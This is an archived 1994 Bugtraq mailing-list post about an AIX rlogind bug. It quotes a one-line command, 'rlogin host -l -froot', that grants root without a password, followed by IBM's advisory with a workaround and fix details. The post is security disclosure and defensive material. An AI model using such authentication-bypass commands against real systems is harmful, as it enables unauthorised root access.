OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 3rd quarter (Jul-Sep) 1994: Re: -froot??? (AIX rlogin bug)

Re: -froot??? (AIX rlogin bug)

Mark G. Scheuern (mgscheuevela.acs.oakland.edu)
Sat, 30 Jul 1994 07:52:22 -0400

>Someone over on the firewalls mailing list just threw out this tidbit:
>
>   rlogin aix.machine -l -froot
>
>For instance:
> 
>   rlogin foobar -l -froot
>
>This gives you root access on any AIX 3.2.X machine.
>
>Does anyone have any history on this trapdoor?  Apparently
>it also existed in Linux several generations ago.
>
>>>>>>>Ericw

This popped up some weeks ago.  This rlogind bug has been around
for a long time;  it's also in AIX 3.1.X.  Here's IBM statement:

-----------------------------------------------------------------

 {URGENT - AIX SECURITY EXPOSURE}

 May 20, 1994

 IBM has just become aware of an AIX security exposure that
 makes it possible to remote login to any AIX Version 3
 system as the root user without a password.

 As described below, a workaround is immediately available
 which eliminates the security exposure by disabling remote
 login.  An emergency fix is also available immediately
 to rectify the AIX problem so that remote login can be
 enabled with no security exposure.

 An APAR has been opened and an official PTF will be
 made available, in approximately two weeks, for installed
 AIX systems and included in all new AIX shipments.

 IBM hopes its efforts to respond rapidly to this problem will
 allow customers to eliminate this security exposure with
 minimal disruption.

 {IMMEDIATE WORKAROUND:}

 The recommended workaround is to disable rlogin in the /etc/inetd.conf
 file using the following procedure:

             1. As root, edit /etc/inetd.conf
             2. Comment out the line 'login ... rlogin'
             3. Run 'inetimp'
             4. Run 'refresh -s inetd'

 {EMERGENCY FIX:}

 Emergency Fixes for the different levels of AIX affected by
 this exposure will be available via anonymous ftp from
 software.watson.ibm.com.  The files will be located
 in /pub/rlogin in compressed tar format.

 {OFFICIAL FIX:}

 The official fix for this problem can be ordered as
 Authorized Program Analysis Report (APAR) IX44254.
 To order an APAR from IBM in the U.S. call 1-800-237-5511
 and ask for shipment as soon as it is available.  APARs
 may be obtained outside the U.S. by contacting your local
 IBM representative.

 For questions regarding this information, please contact
 Frank Karner (KARNER at AUSTIN; TL/793-5950; 512-823-5950).


-----------------------------------------------------------------

When I told one of our on-site IBM droids about this, he didn't
believe it.  "No way, the goverment buys these machines because
they're Class B secure!"  So I showed him... .  I also saw an
IBM spokesperson describe this in a trade publication as requiring
"a complex series of commands".  Hell, it's easier than logging
in the usual way, with the password.

Mark Scheuern
Chrysler Corp.
"I don't speak for Chrysler"